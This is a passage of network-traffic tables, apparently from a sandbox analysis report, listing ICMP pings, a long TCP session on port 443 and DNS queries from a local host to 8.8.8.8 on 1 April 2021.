04/01/21-07:42:07.040459	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/01/21-07:42:11.039405	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/01/21-07:42:15.035238	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/01/21-07:42:19.071881	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/01/21-07:42:23.036318	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/01/21-07:42:27.037681	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/01/21-07:42:31.036811	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
04/01/21-07:42:31.069811	ICMP	408	ICMP Echo Reply	13.107.4.50	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 1, 2021 07:45:26.435566902 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.478147984 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.478259087 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.479070902 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.521552086 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.534030914 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.534054041 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.534066916 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.534079075 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.534224033 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.551301003 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.594008923 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.594080925 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.594995022 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.642653942 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.876184940 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.876216888 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.876230955 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.876246929 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.876261950 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.876364946 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.876398087 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.879012108 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.879033089 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.879138947 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.882077932 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.882103920 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.882241964 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.885045052 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.885070086 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.885191917 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.888066053 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.888092041 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.888215065 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.896469116 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.896631002 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.897058010 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.897149086 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.920533895 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.920563936 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.920715094 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.921978951 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.922003031 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.922103882 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.924967051 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.924994946 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.925097942 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.927953005 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.927983999 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.928090096 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.930926085 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.930965900 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.931082964 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.933958054 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.933989048 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.934043884 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.934098959 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.936952114 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.937001944 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.937047005 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.937093973 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.939922094 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.939948082 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.940052032 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.942869902 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.942890882 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.943018913 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.945904970 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.945930004 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.946086884 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.948846102 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.948868036 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.948987007 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.951828003 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.951868057 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.951960087 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.954854012 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.954925060 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.954963923 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.954986095 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.957878113 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.957906961 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.957998037 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.960839033 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.960863113 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.960953951 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.964852095 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.964884996 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.965053082 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.966298103 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.966320992 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.966459990 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.968224049 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.968250036 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.968362093 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.970232964 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.970264912 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.970804930 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.972218037 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.972256899 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.972441912 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.974116087 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.974145889 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.974257946 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.976017952 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.976047993 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.976162910 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.977925062 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.977953911 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.978065968 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.979815006 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.979842901 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.979938030 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.981729984 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.981754065 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.981852055 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.981936932 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.983614922 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.983637094 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.983731031 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.983850002 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.985486984 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.985511065 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.985604048 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.987379074 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.987406015 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.987588882 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.989332914 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.989362955 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.989481926 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.991244078 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.991271973 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.991415024 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.993148088 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.993264914 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.993295908 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.993371010 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.994971991 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.994993925 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.995110989 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.996800900 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.996824980 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.996957064 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:26.998605967 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.998622894 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:26.998812914 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.000066996 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.000089884 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.000247955 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.002201080 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.002222061 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.002398014 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.003262997 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.003282070 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.003627062 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.004899979 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.004919052 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.005053043 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.006381989 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.006401062 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.006525993 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.008366108 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.008419037 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.008549929 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.008619070 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.009378910 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.009469986 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.009533882 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.009597063 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.010858059 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.010907888 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.010984898 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.011048079 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.011874914 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.011926889 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.011990070 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.012042046 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.012896061 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.012947083 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.013031960 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.013108015 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.013887882 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.013941050 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.013997078 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.014050007 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.014875889 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.014924049 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.015000105 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.015067101 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.015861034 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.015923977 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.015971899 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.016025066 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.016892910 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.016953945 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.017019033 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.017075062 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.017847061 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.017887115 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.018136978 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.018841028 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.018893957 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.018959045 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.019057035 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.019771099 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.019824982 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.019881010 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.019946098 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.020714998 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.020767927 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.020836115 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.020885944 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.021665096 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.021716118 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.021776915 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.021831989 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.022586107 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.022634029 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.022737026 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.023643017 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.023720026 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.023755074 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.023802042 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.024369955 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.024395943 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.024488926 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.025288105 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.025316000 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.025408983 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.026201010 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.026226044 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.026334047 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.026597977 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.027092934 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.027117014 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.027194977 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.027935982 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.027962923 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.028039932 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.028078079 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.028848886 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.028877020 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.028992891 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.029645920 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.029673100 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.029783010 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.030524969 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.030553102 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.030611038 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.030658960 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.031380892 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.031408072 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.031495094 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.032267094 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.032299042 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.032377005 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.033071995 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.033094883 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.033174992 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.033875942 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.033900023 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.033979893 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.034785032 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.034813881 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.034879923 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.035495043 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.035521984 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.035578966 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.035633087 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.036386013 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.036412954 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.036487103 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.037178993 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.037199020 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.037290096 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.037945032 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.037974119 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.038043022 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.038827896 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.038856030 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.038911104 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.038959980 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.039522886 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.039549112 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.039611101 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.040322065 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.040350914 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.040409088 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.040452957 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.041052103 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.041080952 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.041152954 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.041834116 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.041862965 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.041951895 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.042634010 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.042664051 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.042742968 CEST	49747	443	192.168.2.6	216.58.215.225
Apr 1, 2021 07:45:27.043409109 CEST	443	49747	216.58.215.225	192.168.2.6
Apr 1, 2021 07:45:27.043528080 CEST	49747	443	192.168.2.6	216.58.215.225

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 1, 2021 07:41:38.070863008 CEST	54513	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:41:38.118454933 CEST	53	54513	8.8.8.8	192.168.2.6
Apr 1, 2021 07:41:38.879174948 CEST	62044	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:41:38.929502964 CEST	53	62044	8.8.8.8	192.168.2.6
Apr 1, 2021 07:41:39.825949907 CEST	63791	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:41:39.876066923 CEST	53	63791	8.8.8.8	192.168.2.6
Apr 1, 2021 07:41:41.726422071 CEST	64267	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:41:41.783688068 CEST	53	64267	8.8.8.8	192.168.2.6
Apr 1, 2021 07:41:42.364645004 CEST	49448	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:41:42.421184063 CEST	53	49448	8.8.8.8	192.168.2.6
Apr 1, 2021 07:41:43.635649920 CEST	60342	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:41:43.685589075 CEST	53	60342	8.8.8.8	192.168.2.6
Apr 1, 2021 07:41:51.600878000 CEST	61346	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:41:51.649561882 CEST	53	61346	8.8.8.8	192.168.2.6
Apr 1, 2021 07:41:52.768568993 CEST	51774	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:41:52.816342115 CEST	53	51774	8.8.8.8	192.168.2.6
Apr 1, 2021 07:41:53.692286968 CEST	56023	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:41:53.739046097 CEST	53	56023	8.8.8.8	192.168.2.6
Apr 1, 2021 07:41:54.686860085 CEST	58384	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:41:54.735239983 CEST	53	58384	8.8.8.8	192.168.2.6
Apr 1, 2021 07:41:56.208642006 CEST	60261	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:41:56.254461050 CEST	53	60261	8.8.8.8	192.168.2.6
Apr 1, 2021 07:41:57.274804115 CEST	56061	53	192.168.2.6	8.8.8.8
